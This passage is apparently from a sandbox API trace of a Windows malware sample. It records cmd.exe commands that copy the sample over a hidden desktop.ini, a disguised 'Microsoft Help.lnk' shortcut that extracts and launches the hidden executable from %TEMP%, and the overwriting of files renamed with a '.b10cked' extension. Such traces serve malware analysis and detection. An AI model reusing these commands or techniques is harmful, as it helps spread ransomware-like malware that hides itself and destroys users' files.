DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0193.536] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0193.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.537] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0193.537] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0193.537] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2") returned 0x1a [0193.537] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x126 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x126 [0193.537] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0193.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xacc, dwThreadId=0xb0c)) returned 1 [0193.542] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0195.555] CloseHandle (hObject=0x120) returned 1 [0195.555] CloseHandle (hObject=0x1b4) returned 1 [0195.555] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0195.555] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0195.555] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0195.555] GetTickCount () returned 0x37751 [0195.555] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=25234436780) returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x30\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0195.555] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0195.555] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0195.556] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6d | out: lpsz="EXPLORER.EXE \"MICROSOFT HELP\" & TYPE \"MICROSOFT HELP\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6d [0195.556] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0195.556] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6e | out: lpsz="EXPLORER.EXE \"MICROSOFT HELP\" & TYPE \"MICROSOFT HELP\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6e [0195.556] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0195.556] CoInitialize (pvReserved=0x0) returned 0x0 [0195.556] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0195.557] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0195.557] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0195.557] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\desktop.ini\" > \"%TEMP%\\7Nsn015m.exe\" && \"%TEMP%\\7Nsn015m.exe\"") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0195.559] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0195.559] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft Help.lnk", fRemember=0) returned 0x0 [0195.565] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0195.565] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0195.565] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0195.565] CoUninitialize () [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_K.HxW" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mkwd_k.hxw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25235575940) returned 1 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x30e0 [0195.568] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35c8 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35c8 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.570] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.570] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6883, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae5 [0195.570] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.571] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6883, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae5 [0195.571] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_K.HxW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0195.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_K.HxW", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MKWD_K.HxW", lpUsedDefaultChar=0x0) returned 18 [0195.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35c8 [0195.575] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.575] CloseHandle (hObject=0x120) returned 1 [0195.576] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_K.HxW", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW") returned 0x27 [0195.576] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.577] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc30, dwThreadId=0xbfc)) returned 1 [0195.578] CloseHandle (hObject=0x1b4) returned 1 [0195.578] CloseHandle (hObject=0x120) returned 1 [0195.578] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.578] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_NamedURL.HxW" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mkwd_namedurl.hxw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 